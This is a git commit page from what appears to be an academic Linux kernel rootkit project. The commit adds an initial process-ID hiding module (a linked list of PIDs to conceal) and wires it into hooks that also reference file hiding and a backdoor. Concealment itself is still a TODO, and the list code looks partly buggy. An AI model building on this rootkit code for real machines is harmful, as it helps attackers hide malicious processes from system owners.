linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit ac3051356bf62ca2c93930b5667be5fce27b6f0a
parent 48711aa87958834f3f19fe87f98ce6613f81f5ea
Author: deurzen <m.deurzen@tum.de>
Date:   Sat, 28 Nov 2020 18:39:56 +0100

adds initial pid hiding code

Diffstat:

Asrc/hidepid.c | 110+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


Asrc/hidepid.h | 26++++++++++++++++++++++++++


Msrc/hook.c | 3+++


Msrc/rootkit.h | 1+


4 files changed, 140 insertions(+), 0 deletions(-)

diff --git a/src/hidepid.c b/src/hidepid.c
@@ -0,0 +1,110 @@
+#include <linux/slab.h>
+
+#include "hidepid.h"
+
+static pid_list_t hidden_pids = {
+    .pid  = -1,
+    .prev = NULL,
+    .next = NULL,
+    .head = NULL,
+    .tail = NULL
+};
+
+
+void
+hide_pid(pid_t pid)
+{
+    if (list_contains_pid(&hidden_pids, pid))
+        return;
+
+    add_pid_to_list(hidden_pids.tail, pid);
+}
+
+void
+unhide_pid(pid_t pid)
+{
+    remove_pid_from_list(hidden_pids.tail, pid);
+}
+
+void
+clear_hidden_pids(void)
+{
+    pid_list_t_ptr i = hidden_pids.tail;
+    while ((i = remove_pid_from_list(i, i->pid)));
+}
+
+void
+unhide_pids(void)
+{
+    clear_hidden_pids();
+    // TODO: disable pid hiding
+}
+
+
+void
+init_pid_list(void)
+{
+    hidden_pids.head = &hidden_pids;
+    hidden_pids.tail = &hidden_pids;
+}
+
+bool
+list_contains_pid(pid_list_t_ptr list, pid_t pid)
+{
+    return !!find_pid_in_list(list, pid);
+}
+
+pid_list_t_ptr
+find_pid_in_list(pid_list_t_ptr list, pid_t pid)
+{
+    pid_list_t_ptr i;
+    for (i = list; i; i = i->next)
+        if (i->pid == pid)
+            return i;
+
+    for (i = list->prev; i; i = i->prev)
+        if (i->pid == pid)
+            return i;
+
+    return NULL;
+}
+
+pid_list_t_ptr
+add_pid_to_list(pid_list_t_ptr tail, pid_t pid)
+{
+    pid_list_t_ptr node;
+    node = (pid_list_t_ptr)kzalloc(sizeof(pid_list_t), GFP_KERNEL);
+
+    if (node) {
+        node->pid = pid;
+        node->next = NULL;
+        node->prev = tail;
+        tail->next = node;
+        hidden_pids.tail = node;
+        return node;
+    }
+
+    return NULL;
+}
+
+pid_list_t_ptr
+remove_pid_from_list(pid_list_t_ptr list, pid_t pid)
+{
+    pid_list_t_ptr ret = NULL, i = find_pid_in_list(list, pid);
+
+    if (i) {
+        if (i->next)
+            i->next->prev = i->prev;
+        else
+            hidden_pids.head = i->prev;
+
+        if (i->prev) {
+            i->prev->next = i->next;
+            ret = i->prev;
+        }
+
+        kfree(i);
+    }
+
+    return ret;
+}
diff --git a/src/hidepid.h b/src/hidepid.h
@@ -0,0 +1,26 @@
+#ifndef _GROUP7_HIDEPID_H
+#define _GROUP7_HIDEPID_H
+
+#include <linux/types.h>
+
+typedef struct pid_list *pid_list_t_ptr;
+typedef struct pid_list {
+    pid_t pid;
+    pid_list_t_ptr prev;
+    pid_list_t_ptr next;
+    pid_list_t_ptr head;
+    pid_list_t_ptr tail;
+} pid_list_t;
+
+void hide_pid(pid_t);
+void unhide_pid(pid_t);
+void clear_hidden_pids(void);
+void unhide_pids(void);
+
+void init_pid_list(void);
+bool list_contains_pid(pid_list_t_ptr, pid_t);
+pid_list_t_ptr find_pid_in_list(pid_list_t_ptr, pid_t);
+pid_list_t_ptr add_pid_to_list(pid_list_t_ptr, pid_t);
+pid_list_t_ptr remove_pid_from_list(pid_list_t_ptr, pid_t);
+
+#endif//_GROUP7_HIDEPID_H
diff --git a/src/hook.c b/src/hook.c
@@ -10,6 +10,7 @@
 #include "rootkit.h"
 #include "filehide.h"
 #include "backdoor.h"
+#include "hidepid.h"
 
 extern rootkit_t rootkit;
 
@@ -56,6 +57,8 @@ init_hooks(void)
         backdoor_read();
     else if (rootkit.backdoor == BD_TTY)
         backdoor_tty();
+
+    init_pid_list();
 }
 
 void
diff --git a/src/rootkit.h b/src/rootkit.h
@@ -12,6 +12,7 @@ typedef enum {
 typedef struct {
     sc_hook_t hooks[16];
     bool hiding_files;
+    bool hiding_pids;
     bd_state_t backdoor;
 } rootkit_t;